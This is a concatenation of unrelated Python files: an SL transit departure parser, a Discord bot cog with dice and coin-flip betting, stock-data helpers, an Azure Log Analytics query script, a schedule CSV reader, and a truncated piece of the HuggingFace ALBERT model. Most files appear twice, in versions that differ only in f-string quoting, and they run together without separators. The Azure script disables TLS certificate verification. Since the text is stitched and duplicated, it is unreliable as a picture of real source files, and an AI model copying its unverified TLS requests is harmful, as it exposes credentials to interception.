or '' groupofline = value['GroupOfLine'] or '' icon = iconswitcher.get(traffictype, 'mdi:train-car') diff = self.parseDepartureTime(displaytime) departures.append({ 'line': linenumber, 'direction': direction, 'departure': displaytime, 'destination': destination, 'time': diff, 'expected': datetime.strptime( expected, '%Y-%m-%dT%H:%M:%S' ), 'type': traffictype, 'groupofline': groupofline, 'icon': icon, }) newdata['data'] = sorted(departures, key=lambda k: k['time']) newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_ri4] Stop {stop} updated sucessfully") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_ri4] Error occured during update {stop}") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.ri4[stop] = newdata logger.debug(f"[process_ri4] Completed stop {stop}") logger.debug(f"[process_ri4] Completed key {ri4key}") logger.debug("[process_ri4] Completed") return async def assert_tl2(self, key): logger.debug("[assert_tl2] Entered") if key not in self.data.tl2: logger.debug("[assert_tl2] Registering key") self.data.tl2[key] = { "api_type": "slapi-tl2", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending" } else: logger.debug("[assert_tl2] Key already present") logger.debug("[assert_tl2] Completed") return async def process_tl2(self, notarealarg=None): logger.debug("[process_tl2] Entered") for tl2key in list(self.data.tl2): logger.debug(f"[process_tl2] Processing {tl2key}") newdata = self.data.tl2[tl2key] statuses = { 'EventGood': 'Good', 'EventMinor': 'Minor', 'EventMajor': 'Closed', 'EventPlanned': 'Planned', } # Icon table used for HomeAssistant. statusIcons = { 'EventGood': 'mdi:check', 'EventMinor': 'mdi:clock-alert-outline', 'EventMajor': 'mdi:close', 'EventPlanned': 'mdi:triangle-outline' } try: api = slapi_tl2(tl2key) apidata = await api.request() apidata = apidata['ResponseData']['TrafficTypes'] responselist = {} for response in apidata: statustype = ('ferry' if response['Type'] == 'fer' else response['Type']) for event in response['Events']: event['Status'] = statuses.get(event['StatusIcon']) event['StatusIcon'] = \ statusIcons.get(event['StatusIcon']) responsedata = { 'status': statuses.get(response['StatusIcon']), 'status_icon': statusIcons.get(response['StatusIcon']), 'events': response['Events'] } responselist[statustype] = responsedata # Attribution and update sensor data. newdata['data'] = responselist newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_tl2] Update of {tl2key} succeeded") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_tl2] Update of {tl2key} failed") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.tl2[tl2key] = newdata logger.debug(f"[process_tl2] Completed {tl2key}") logger.debug("[process_tl2] Completed") return
from discord.ext import commands from discord_slash import SlashContext, cog_ext import sqlite3 import random from discord_slash.model import SlashCommandOptionType from discord_slash.utils.manage_commands import create_choice, create_option class Fun(commands.Cog): def __init__(self, bot): self.bot = bot self._last_member = None @cog_ext.cog_slash(name="roll",description="roll a dice") async def roll(self,ctx:SlashContext, number_of_dice: int, number_of_sides: int,hidden: bool = False): dice = [ str(random.choice(range(1, number_of_sides + 1))) for _ in range(number_of_dice) ] await ctx.send(", ".join(dice),hidden=hidden) @cog_ext.cog_slash(name="coinflip",description="flip a coin",options=[ create_option("hidden",description="Whether to show the output of the message in chat",option_type=SlashCommandOptionType.BOOLEAN,required=False), create_option("bet",description="How much you want to bet on the coin",option_type=SlashCommandOptionType.INTEGER,required=False), create_option("choice",description="Which side you think the coin will land on",option_type=SlashCommandOptionType.STRING,required=False,choices=[ create_choice(name="Heads",value="h"), create_choice(name="Tails",value="t"), ]) ]) async def coinflip(self,ctx:SlashContext,hidden:bool=True,bet:int=0,choice:str="ha"): coin = "heads" if random.choice((0,1)) == 0 else "tails" # await ctx.send(f"It landed on {coin}!" + ("" if choice == "ha" else f"\n\nYou were {"right" if choice == coin[0] else "wrong"}!"),hidden=hidden) default = len(choice) == 2 choice = choice[0] betmsg = "" if bet: if abs(bet) != bet: await ctx.send("You cannot bet a negative amount!",hidden=True) return con = sqlite3.connect("users.db") money = list(con.execute("SELECT money FROM users WHERE id = ?",(ctx.author_id,)))[0][0] if bet > money: await ctx.send("You are betting money you don't have!",hidden=True) return con.execute("UPDATE users SET money = ? WHERE id = ?",(money + (bet * (1 if choice == coin[0] else -1)),str(ctx.author_id))) con.commit() betmsg = f"\n\n{"+" if choice == coin[0] else "-"}<a:goldcoin:801148801653276693>{bet}." await ctx.send(f"It landed on {coin}!" + ("" if default and not bet else f"\n\nYou were {"right" if choice == coin[0] else "wrong"}!") + betmsg,hidden=hidden) @cog_ext.cog_slash(name="jack",description="show jack") async def jack(self,ctx:SlashContext): await ctx.send("""\ <:jack1:887072181262123090><:jack2:887072180951724103> <:jack4:887072181442457641><:jack5:887072180544884747><:jack6:887072180679114782> <:jack7:887072181262123088><:jack8:887072181752823858><:jack9:887072181505359893>""".replace(" ","")) if __name__ == "__main__": import main
from discord.ext import commands from discord_slash import SlashContext, cog_ext import sqlite3 import random from discord_slash.model import SlashCommandOptionType from discord_slash.utils.manage_commands import create_choice, create_option class Fun(commands.Cog): def __init__(self, bot): self.bot = bot self._last_member = None @cog_ext.cog_slash(name="roll",description="roll a dice") async def roll(self,ctx:SlashContext, number_of_dice: int, number_of_sides: int,hidden: bool = False): dice = [ str(random.choice(range(1, number_of_sides + 1))) for _ in range(number_of_dice) ] await ctx.send(", ".join(dice),hidden=hidden) @cog_ext.cog_slash(name="coinflip",description="flip a coin",options=[ create_option("hidden",description="Whether to show the output of the message in chat",option_type=SlashCommandOptionType.BOOLEAN,required=False), create_option("bet",description="How much you want to bet on the coin",option_type=SlashCommandOptionType.INTEGER,required=False), create_option("choice",description="Which side you think the coin will land on",option_type=SlashCommandOptionType.STRING,required=False,choices=[ create_choice(name="Heads",value="h"), create_choice(name="Tails",value="t"), ]) ]) async def coinflip(self,ctx:SlashContext,hidden:bool=True,bet:int=0,choice:str="ha"): coin = "heads" if random.choice((0,1)) == 0 else "tails" # await ctx.send(f"It landed on {coin}!" + ("" if choice == "ha" else f"\n\nYou were {'right' if choice == coin[0] else 'wrong'}!"),hidden=hidden) default = len(choice) == 2 choice = choice[0] betmsg = "" if bet: if abs(bet) != bet: await ctx.send("You cannot bet a negative amount!",hidden=True) return con = sqlite3.connect("users.db") money = list(con.execute("SELECT money FROM users WHERE id = ?",(ctx.author_id,)))[0][0] if bet > money: await ctx.send("You are betting money you don't have!",hidden=True) return con.execute("UPDATE users SET money = ? WHERE id = ?",(money + (bet * (1 if choice == coin[0] else -1)),str(ctx.author_id))) con.commit() betmsg = f"\n\n{'+' if choice == coin[0] else '-'}<a:goldcoin:801148801653276693>{bet}." await ctx.send(f"It landed on {coin}!" + ("" if default and not bet else f"\n\nYou were {'right' if choice == coin[0] else 'wrong'}!") + betmsg,hidden=hidden) @cog_ext.cog_slash(name="jack",description="show jack") async def jack(self,ctx:SlashContext): await ctx.send("""\ <:jack1:887072181262123090><:jack2:887072180951724103> <:jack4:887072181442457641><:jack5:887072180544884747><:jack6:887072180679114782> <:jack7:887072181262123088><:jack8:887072181752823858><:jack9:887072181505359893>""".replace(" ","")) if __name__ == "__main__": import main
BIL = 1000*1000*1000 class C: COL_GIA3 = 3 COL_VOL3 = 4 COL_GIA2 = 5 COL_VOL2 = 6 COL_GIA1 = 7 COL_VOL1 = 8 COL_GIA = 9 COL_VOL = 10 COL_GIA1b = 12 COL_VOL1b = 13 COL_GIA2b = 14 COL_VOL2b = 15 COL_GIA3b = 16 COL_VOL3b = 17 COL_TOTAL_VOL = 18 COL_AVG_PRICE = 21 COL_HIGH = 22 COL_LOW = 23 NN_BUY = 24 NN_SELL = 25 DATA_2_PLOT_RATIO = 100000 CTIME = "times" CBUYP = "buyPressure" CSELLP = "sellPressure" CHOSE="hoseSnapShot" LOCAL="local" def exec3(cmd): # #print(f"****\n running: {cmd} ****") import subprocess process = subprocess.Popen(cmd.split(" "), stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = process.communicate() # print (stdout.decode("utf-8"), stderr.decode("utf-8")) return stdout.decode("utf-8"), f"""error code: {stderr.decode("utf-8")}""" def threading_func_wrapper(func, delay=0.5, args=None, start=True): import threading if args is None: func_thread = threading.Timer(delay, func) else: func_thread = threading.Timer(delay, func, (args,)) if start: func_thread.start() return func_thread def mmap(*args): return list(map(*args)) def dump(history): from CONSTANT import OUTPUT_PICKLE_FILENAME import pickle n= len(history) if n == 0: return if not n % 50 == 0: return with open(OUTPUT_PICKLE_FILENAME, "wb") as file: pickle.dump(history, file) lastWrite = history[-1] def load(): from CONSTANT import OUTPUT_PICKLE_FILENAME import pickle with open(OUTPUT_PICKLE_FILENAME, "rb") as file: return pickle.load(file) data = load() #%%
BIL = 1000*1000*1000 class C: COL_GIA3 = 3 COL_VOL3 = 4 COL_GIA2 = 5 COL_VOL2 = 6 COL_GIA1 = 7 COL_VOL1 = 8 COL_GIA = 9 COL_VOL = 10 COL_GIA1b = 12 COL_VOL1b = 13 COL_GIA2b = 14 COL_VOL2b = 15 COL_GIA3b = 16 COL_VOL3b = 17 COL_TOTAL_VOL = 18 COL_AVG_PRICE = 21 COL_HIGH = 22 COL_LOW = 23 NN_BUY = 24 NN_SELL = 25 DATA_2_PLOT_RATIO = 100000 CTIME = "times" CBUYP = "buyPressure" CSELLP = "sellPressure" CHOSE="hoseSnapShot" LOCAL="local" def exec3(cmd): # #print(f"****\n running: {cmd} ****") import subprocess process = subprocess.Popen(cmd.split(" "), stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = process.communicate() # print (stdout.decode("utf-8"), stderr.decode("utf-8")) return stdout.decode("utf-8"), f"""error code: {stderr.decode("utf-8")}""" def threading_func_wrapper(func, delay=0.5, args=None, start=True): import threading if args is None: func_thread = threading.Timer(delay, func) else: func_thread = threading.Timer(delay, func, (args,)) if start: func_thread.start() return func_thread def mmap(*args): return list(map(*args)) def dump(history): from CONSTANT import OUTPUT_PICKLE_FILENAME import pickle n= len(history) if n == 0: return if not n % 50 == 0: return with open(OUTPUT_PICKLE_FILENAME, "wb") as file: pickle.dump(history, file) lastWrite = history[-1] def load(): from CONSTANT import OUTPUT_PICKLE_FILENAME import pickle with open(OUTPUT_PICKLE_FILENAME, "rb") as file: return pickle.load(file) data = load() #%%
#import modules region import requests, urllib3, json import pandas as pd from pandas.io.json import json_normalize from datetime import datetime from datetime import timedelta import plotly.express as px import re #variables region workspaceid = '<>' # Tenant ID for your Azure subscription TENANT_ID = '<>' # Your service principal App ID CLIENT = '<>' # Your service principal password KEY = '<>' loginURL = "https://login.microsoftonline.com/" + TENANT_ID + "/oauth2/token" resource = "https://api.loganalytics.io" url = "https://api.loganalytics.io/v1/workspaces/" + workspaceid + "/query" StartDateTime = datetime.strptime('2020-10-22 00:00:00', '%Y-%m-%d %H:%M:%S') StartDateTime = StartDateTime + timedelta(hours=4) EndDateTime = datetime.strptime('2020-10-30 00:00:00', '%Y-%m-%d %H:%M:%S') EndDateTime = EndDateTime + timedelta(hours=4) servername = '<>' #saving query parameters to the array of query dicts queryParam = [ { 'Computer':servername, 'CounterName':'% Privileged Time', 'ObjectName':'Processor', 'InstanceName':'' }, { 'Computer':servername, 'CounterName':'% User Time', 'ObjectName':'Processor', 'InstanceName':'' }, { 'Computer':servername, 'CounterName':'Processor Queue Length', 'ObjectName':'System', 'InstanceName':'' }, { 'Computer':servername, 'CounterName':'Available Bytes', 'ObjectName':'Memory', 'InstanceName':'' }, { 'Computer':servername, 'CounterName':'Pages/sec', 'ObjectName':'Memory', 'InstanceName':'' } ] #get authorizartion token function def get_token(url, resource, Username, Password): payload = { 'grant_type': 'client_credentials', 'client_id': Username, 'client_secret': Password, 'Content_Type': 'x-www-form-urlencoded', 'resource': resource, } urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) ApiReturn = requests.post(url, data=payload, verify=False) ApiToken = json.loads(ApiReturn.content)["access_token"] return { "Authorization": str("Bearer "+ ApiToken), 'Content-Type': 'application/json'} def createQueries(queryParam): #creating array for queries queries = [] #iterating through list of query parameters dicts for query in queryParam: if query['InstanceName']: queries.append((f"Perf | where TimeGenerated between(datetime({StartDateTime}) .. datetime({EndDateTime})) " f"and Computer == '{query["Computer"]}' and CounterName == '{query["CounterName"]}' " f"and ObjectName == '{query["ObjectName"]}' and InstanceName == '{query["InstanceName"]}' " "| extend ET_TimeGenerated = TimeGenerated - 4h " "| project Computer, ObjectName, CounterName, InstanceName, CounterValue, TimeGenerated, ET_TimeGenerated")) else: queries.append((f"Perf | where TimeGenerated between(datetime({StartDateTime}) .. datetime({EndDateTime})) " f"and Computer == '{query["Computer"]}' and CounterName == '{query["CounterName"]}' " f"and ObjectName == '{query["ObjectName"]}' " "| extend ET_TimeGenerated = TimeGenerated - 4h " "| project Computer, ObjectName, CounterName, InstanceName, CounterValue, TimeGenerated, ET_TimeGenerated")) return queries def getlogdata(query): #getting auth token to use with request Headers = get_token(loginURL, resource, CLIENT, KEY) params = { "query": query } result = requests.get(url, params=params, headers=Headers, verify=False) print(f"REST API request: {result}") JSONContent = result.json() columns = len(result.json()['tables'][0]['columns']) dtcolumns =[] for column in range(0,columns): dtcolumns.append(result.json()['tables'][0]['columns'][column]['name']) dtrows =[] dtrows = (result.json()['tables'][0]['rows']) df=pd.DataFrame(dtrows) df= pd.DataFrame(dtrows, columns=dtcolumns) df.sort_values(by=['ET_TimeGenerated'],inplace=True) if {'CounterValueMB'}.issubset(df.columns): df.drop(columns=['CounterValue'],inplace=True) df.rename(columns={"CounterValueMB":"CounterValue"},inplace=True) return df def drawgraph(df): figtitle = servername + " - " + df['ObjectName'][0] + " - " + df['CounterName'][0] print(f"Now working on: {figtitle}") now = datetime.now() now = now.strftime("%d-%m-%Y-%H-%M-%S") if(df['InstanceName'][0]): lineColor = 'InstanceName' else: lineColor = 'CounterName' fileName = re.sub('[^a-zA-Z0-9\n\.]','',df['CounterName'][0]) filepath = "/Users/Temp/PY/" + fileName + "-" + now +".html" fig = px.line(df, x = 'ET_TimeGenerated', y = 'CounterValue', title=figtitle, color=lineColor) fig.write_html(filepath) queries = createQueries(queryParam) for qstr in queries: df = getlogdata(qstr) df.reset_index(drop = True, inplace = True) drawgraph(df) now = datetime.now() now = now.strftime("%d-%m-%Y-%H-%M-%S") fileName = re.sub('[^a-zA-Z0-9\n\.]','',df['CounterName'][0]) filepath = "/Users/Temp/PY/" + fileName + "-" + now +".csv" df.to_csv(filepath)
#import modules region import requests, urllib3, json import pandas as pd from pandas.io.json import json_normalize from datetime import datetime from datetime import timedelta import plotly.express as px import re #variables region workspaceid = '<>' # Tenant ID for your Azure subscription TENANT_ID = '<>' # Your service principal App ID CLIENT = '<>' # Your service principal password KEY = '<>' loginURL = "https://login.microsoftonline.com/" + TENANT_ID + "/oauth2/token" resource = "https://api.loganalytics.io" url = "https://api.loganalytics.io/v1/workspaces/" + workspaceid + "/query" StartDateTime = datetime.strptime('2020-10-22 00:00:00', '%Y-%m-%d %H:%M:%S') StartDateTime = StartDateTime + timedelta(hours=4) EndDateTime = datetime.strptime('2020-10-30 00:00:00', '%Y-%m-%d %H:%M:%S') EndDateTime = EndDateTime + timedelta(hours=4) servername = '<>' #saving query parameters to the array of query dicts queryParam = [ { 'Computer':servername, 'CounterName':'% Privileged Time', 'ObjectName':'Processor', 'InstanceName':'' }, { 'Computer':servername, 'CounterName':'% User Time', 'ObjectName':'Processor', 'InstanceName':'' }, { 'Computer':servername, 'CounterName':'Processor Queue Length', 'ObjectName':'System', 'InstanceName':'' }, { 'Computer':servername, 'CounterName':'Available Bytes', 'ObjectName':'Memory', 'InstanceName':'' }, { 'Computer':servername, 'CounterName':'Pages/sec', 'ObjectName':'Memory', 'InstanceName':'' } ] #get authorizartion token function def get_token(url, resource, Username, Password): payload = { 'grant_type': 'client_credentials', 'client_id': Username, 'client_secret': Password, 'Content_Type': 'x-www-form-urlencoded', 'resource': resource, } urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) ApiReturn = requests.post(url, data=payload, verify=False) ApiToken = json.loads(ApiReturn.content)["access_token"] return { "Authorization": str("Bearer "+ ApiToken), 'Content-Type': 'application/json'} def createQueries(queryParam): #creating array for queries queries = [] #iterating through list of query parameters dicts for query in queryParam: if query['InstanceName']: queries.append((f"Perf | where TimeGenerated between(datetime({StartDateTime}) .. datetime({EndDateTime})) " f"and Computer == '{query['Computer']}' and CounterName == '{query['CounterName']}' " f"and ObjectName == '{query['ObjectName']}' and InstanceName == '{query['InstanceName']}' " "| extend ET_TimeGenerated = TimeGenerated - 4h " "| project Computer, ObjectName, CounterName, InstanceName, CounterValue, TimeGenerated, ET_TimeGenerated")) else: queries.append((f"Perf | where TimeGenerated between(datetime({StartDateTime}) .. datetime({EndDateTime})) " f"and Computer == '{query['Computer']}' and CounterName == '{query['CounterName']}' " f"and ObjectName == '{query['ObjectName']}' " "| extend ET_TimeGenerated = TimeGenerated - 4h " "| project Computer, ObjectName, CounterName, InstanceName, CounterValue, TimeGenerated, ET_TimeGenerated")) return queries def getlogdata(query): #getting auth token to use with request Headers = get_token(loginURL, resource, CLIENT, KEY) params = { "query": query } result = requests.get(url, params=params, headers=Headers, verify=False) print(f"REST API request: {result}") JSONContent = result.json() columns = len(result.json()['tables'][0]['columns']) dtcolumns =[] for column in range(0,columns): dtcolumns.append(result.json()['tables'][0]['columns'][column]['name']) dtrows =[] dtrows = (result.json()['tables'][0]['rows']) df=pd.DataFrame(dtrows) df= pd.DataFrame(dtrows, columns=dtcolumns) df.sort_values(by=['ET_TimeGenerated'],inplace=True) if {'CounterValueMB'}.issubset(df.columns): df.drop(columns=['CounterValue'],inplace=True) df.rename(columns={"CounterValueMB":"CounterValue"},inplace=True) return df def drawgraph(df): figtitle = servername + " - " + df['ObjectName'][0] + " - " + df['CounterName'][0] print(f"Now working on: {figtitle}") now = datetime.now() now = now.strftime("%d-%m-%Y-%H-%M-%S") if(df['InstanceName'][0]): lineColor = 'InstanceName' else: lineColor = 'CounterName' fileName = re.sub('[^a-zA-Z0-9\n\.]','',df['CounterName'][0]) filepath = "/Users/Temp/PY/" + fileName + "-" + now +".html" fig = px.line(df, x = 'ET_TimeGenerated', y = 'CounterValue', title=figtitle, color=lineColor) fig.write_html(filepath) queries = createQueries(queryParam) for qstr in queries: df = getlogdata(qstr) df.reset_index(drop = True, inplace = True) drawgraph(df) now = datetime.now() now = now.strftime("%d-%m-%Y-%H-%M-%S") fileName = re.sub('[^a-zA-Z0-9\n\.]','',df['CounterName'][0]) filepath = "/Users/Temp/PY/" + fileName + "-" + now +".csv" df.to_csv(filepath)
import csv from datetime import datetime SCHEDULE = 'schedule.csv' HEADERS = ("Date", "Week", "Class", "Day", "Learning Outcome", "Chapter", "Pages", "Quiz", "Assignmt", "Lab", "Outcomes") OPTIONS_DATE = {1: "Specify a specific date", 2: "Use today's date"} def getDate(): # Determine current date and time of the device used. now = datetime.now() # Display date in the format return now.strftime('%Y-%m-%d') def getDateMANUAL(): print("\r\n\t\tHINT: Use the due date of the assignment.") year = input("\r\n\tEnter the year (YYYY): ") month = input("\r\n\tEnter the month (MM): ") day = input("\r\n\tEnter the day (DD): ") if len(day) != 2 or len(month) != 2 or len(year) != 4: print("\r\n\t\tERROR: Please enter the proper number of characters.") getDateMANUAL() else: return "-".join([year, month, day]) def getDateTime(): # Determine current date and time of the device used. now = datetime.now() # Display date and time in the format: YYYY-MM-DD H:M:S dateTime = now.strftime('%Y-%m-%d %H:%M:%S') return dateTime # A function that opens a CSV file to create and return a date-based list and # dictionary. def getSchedule(filename): with open(filename) as csv_file: csv_reader = csv.reader(csv_file, delimiter=',') line_count = 0 dates = [] datesDictionary = {} headers = "" for row in csv_reader: if line_count == 0: # print(f'Column names are {', '.join(row)}') headers = row # print(headers) line_count += 1 else: rowDictionary = {} for index in range(len(row)): cell = row[index] if len(cell) > 0: rowDictionary[headers[index]] = cell dateList = row[0].split("/") # SEE: https://docs.python.org/3/library/datetime.html?highlight=datetime#module-datetime # Given: MM/DD/YYYY, Required: YYYY-MM-DD mm = str(dateList[0]).zfill(2) dd = str(dateList[1]).zfill(2) dateString = "-".join([dateList[2], mm , dd]) dates.append(dateString) datesDictionary[dateString] = rowDictionary line_count += 1 return {"list": dates, "dictionary": datesDictionary} def scheduleCheck(date=getDate(), dates=[]): try: if dates.index(date) >= 0: return True except ValueError: return False
import csv from datetime import datetime SCHEDULE = 'schedule.csv' HEADERS = ("Date", "Week", "Class", "Day", "Learning Outcome", "Chapter", "Pages", "Quiz", "Assignmt", "Lab", "Outcomes") OPTIONS_DATE = {1: "Specify a specific date", 2: "Use today's date"} def getDate(): # Determine current date and time of the device used. now = datetime.now() # Display date in the format return now.strftime('%Y-%m-%d') def getDateMANUAL(): print("\r\n\t\tHINT: Use the due date of the assignment.") year = input("\r\n\tEnter the year (YYYY): ") month = input("\r\n\tEnter the month (MM): ") day = input("\r\n\tEnter the day (DD): ") if len(day) != 2 or len(month) != 2 or len(year) != 4: print("\r\n\t\tERROR: Please enter the proper number of characters.") getDateMANUAL() else: return "-".join([year, month, day]) def getDateTime(): # Determine current date and time of the device used. now = datetime.now() # Display date and time in the format: YYYY-MM-DD H:M:S dateTime = now.strftime('%Y-%m-%d %H:%M:%S') return dateTime # A function that opens a CSV file to create and return a date-based list and # dictionary. def getSchedule(filename): with open(filename) as csv_file: csv_reader = csv.reader(csv_file, delimiter=',') line_count = 0 dates = [] datesDictionary = {} headers = "" for row in csv_reader: if line_count == 0: # print(f'Column names are {", ".join(row)}') headers = row # print(headers) line_count += 1 else: rowDictionary = {} for index in range(len(row)): cell = row[index] if len(cell) > 0: rowDictionary[headers[index]] = cell dateList = row[0].split("/") # SEE: https://docs.python.org/3/library/datetime.html?highlight=datetime#module-datetime # Given: MM/DD/YYYY, Required: YYYY-MM-DD mm = str(dateList[0]).zfill(2) dd = str(dateList[1]).zfill(2) dateString = "-".join([dateList[2], mm , dd]) dates.append(dateString) datesDictionary[dateString] = rowDictionary line_count += 1 return {"list": dates, "dictionary": datesDictionary} def scheduleCheck(date=getDate(), dates=[]): try: if dates.index(date) >= 0: return True except ValueError: return False
# coding=utf-8 # Copyright 2018 Google AI, Google Brain and the HuggingFace Inc. team. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """PyTorch ALBERT model. """ import math import os from dataclasses import dataclass from typing import Optional, Tuple import torch from packaging import version from torch import nn from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss from ...activations import ACT2FN from ...file_utils import ( ModelOutput, add_code_sample_docstrings, add_start_docstrings, add_start_docstrings_to_model_forward, replace_return_docstrings, ) from ...modeling_outputs import ( BaseModelOutput, BaseModelOutputWithPooling, MaskedLMOutput, MultipleChoiceModelOutput, QuestionAnsweringModelOutput, SequenceClassifierOutput, TokenClassifierOutput, ) from ...modeling_utils import ( PreTrainedModel, apply_chunking_to_forward, find_pruneable_heads_and_indices, prune_linear_layer, ) from ...utils import logging from .configuration_albert import AlbertConfig logger = logging.get_logger(__name__) _CHECKPOINT_FOR_DOC = "albert-base-v2" _CONFIG_FOR_DOC = "AlbertConfig" _TOKENIZER_FOR_DOC = "AlbertTokenizer" ALBERT_PRETRAINED_MODEL_ARCHIVE_LIST = [ "albert-base-v1", "albert-large-v1", "albert-xlarge-v1", "albert-xxlarge-v1", "albert-base-v2", "albert-large-v2", "albert-xlarge-v2", "albert-xxlarge-v2", # See all ALBERT models at https://huggingface.co/models?filter=albert ] def load_tf_weights_in_albert(model, config, tf_checkpoint_path): """Load tf checkpoints in a pytorch model.""" try: import re import numpy as np import tensorflow as tf except ImportError: logger.error( "Loading a TensorFlow model in PyTorch, requires TensorFlow to be installed. Please see " "https://www.tensorflow.org/install/ for installation instructions." ) raise tf_path = os.path.abspath(tf_checkpoint_path) logger.info(f"Converting TensorFlow checkpoint from {tf_path}") # Load weights from TF model init_vars = tf.train.list_variables(tf_path) names = [] arrays = [] for name, shape in init_vars: logger.info(f"Loading TF weight {name} with shape {shape}") array = tf.train.load_variable(tf_path, name) names.append(name) arrays.append(array) for name, array in zip(names, arrays): print(name) for name, array in zip(names, arrays): original_name = name # If saved from the TF HUB module name = name.replace("module/", "") # Renaming and simplifying name = name.replace("ffn_1", "ffn") name = name.replace("bert/", "albert/") name = name.replace("attention_1", "attention") name = name.replace("transform/", "") name = name.replace("LayerNorm_1", "full_layer_layer_norm") name = name.replace("LayerNorm", "attention/LayerNorm") name = name.replace("transformer/", "") # The feed forward layer had an 'intermediate' step which has been abstracted away name = name.replace("intermediate/dense/", "") name = name.replace("ffn/intermediate/output/dense/", "ffn_output/") # ALBERT attention was split between self and output which have been abstracted away name = name.replace("/output/", "/") name = name.replace("/self/", "/") # The pooler is a linear layer name = name.replace("pooler/dense", "pooler") # The classifier was simplified to predictions from cls/predictions name = name.replace("cls/predictions", "predictions") name = name.replace("predictions/attention", "predictions") # Naming was changed to be more explicit name = name.replace("embeddings/attention", "embeddings") name = name.replace("inner_group_", "albert_layers/") name = name.replace("group_", "albert_layer_groups/") # Classifier if len(name.split("/")) == 1 and ("output_bias" in name or "output_weights" in name): name = "classifier/" + name # No ALBERT model currently handles the next sentence prediction task if "seq_relationship" in name: name = name.replace("seq_relationship/output_", "sop_classifier/classifier/") name = name.replace("weights", "weight") name = name.split("/") # Ignore the gradients applied by the LAMB/ADAM optimizers. if ( "adam_m" in name or "adam_v" in name or "AdamWeightDecayOptimizer" in name or "AdamWeightDecayOptimizer_1" in name or "global_step" in name ): logger.info(f"Skipping {"/".join(name)}") continue pointer = model for m_name in name: if re.fullmatch(r"[A-Za-z]+_\d+", m_name): scope_names = re.split(r"_(\d+)", m_name) else: scope_names = [m_name] if scope_names[0] == "kernel" or scope_names[0] == "gamma": pointer = getattr(pointer, "weight") elif scope_names[0] == "output_bias" or scope_names[0] == "beta": pointer = getattr(pointer, "bias") elif scope_names[0] == "output_weights": pointer = getattr(pointer, "weight") elif scope_names[0] == "squad": pointer = getattr(pointer, "classifier") else: try: pointer = getattr(pointer, scope_names[0]) except AttributeError: logger.info(f"Skipping {"/".join(name)}") continue if len(scope_names) >= 2: num = int(scope_names[1]) pointer = pointer[num] if m_name[-11:] == "_embeddings": pointer = getattr(pointer, "weight") elif m_name == "kernel": array = np.transpose(array) try: if pointer.shape != array.shape: raise ValueError(f"Pointer shape {pointer.shape} and array shape {array.shape} mismatched") except AssertionError as e: e.args += (pointer.shape, array.shape) raise print(f"Initialize PyTorch weight {name} from {original_name}") pointer.data = torch.from_numpy(array) return model class AlbertEmbeddings(nn.Module): """ Construct the embeddings from word, position and token_type embeddings. """ def __init__(self, config): super().__init__() self.word_embeddings = nn.Embedding(config.vocab_size, config.embedding_size, padding_idx=config.pad_token_id) self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.embedding_size) self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.embedding_size) # self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load # any TensorFlow checkpoint file self.LayerNorm = nn.LayerNorm(config.embedding_size, eps=config.layer_norm_eps) self.dropout = nn.Dropout(config.hidden_dropout_prob) # position_ids (1, len position emb) is contiguous in memory and exported when serialized self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1))) self.position_embedding_type = getattr(config, "position_embedding_type", "absolute") if version.parse(torch.__version__) > version.parse("1.6.0"): self.register_buffer( "token_type_ids", torch.zeros(self.position_ids.size(), dtype=torch.long), persistent=False, ) # Copied from transformers.models.bert.modeling_bert.BertEmbeddings.forward def forward( self, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None, past_key_values_length=0 ): if input_ids is not None: input_shape = input_ids.size() else: input_shape = inputs_embeds.size()[:-1] seq_length = input_shape[1] if position_ids is None: position_ids = self.position_ids[:, past_key_values_length : seq_length + past_key_values_length] # Setting the token_type_ids to the registered buffer in constructor where it is all zeros, which usually occurs # when its auto-generated, registered buffer helps users when tracing the model without passing token_type_ids, solves # issue #5664 if token_type_ids is None: if hasattr(self, "token_type_ids"): buffered_token_type_ids = self.token_type_ids[:, :seq_length] buffered_token_type_ids_expanded = buffered_token_type_ids.expand(input_shape[0], seq_length) token_type_ids = buffered_token_type_ids_expanded else: token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=self.position_ids.device) if inputs_embeds is None: inputs_embeds = self.word_embeddings(input_ids) token_type_embeddings = self.token_type_embeddings(token_type_ids) embeddings = inputs_embeds + token_type_embeddings if self.position_embedding_type == "absolute": position_embeddings = self.position_embeddings(position_ids) embeddings += position_embeddings embeddings = self.LayerNorm(embeddings) embeddings = self.dropout(embeddings) return embeddings class AlbertAttention(nn.Module): def __init__(self, config): super().__init__() if config.hidden_size % config.num_attention_heads != 0 and not hasattr(config, "embedding_size"): raise ValueError( f"The hidden size ({config.hidden_size}) is not a multiple of the number of attention " f"heads ({config.num_attention_heads}" ) self.num_attention_heads = config.num_attention_heads self.hidden_size = config.hidden_size self.attention_head_size = config.hidden_size // config.num_attention_heads self.all_head_size = self.num_attention_heads * self.attention_head_size self.query = nn.Linear(config.hidden_size, self.all_head_size) self.key = nn.Linear(config.hidden_size, self.all_head_size) self.value = nn.Linear(config.hidden_size, self.all_head_size) self.attention_dropout = 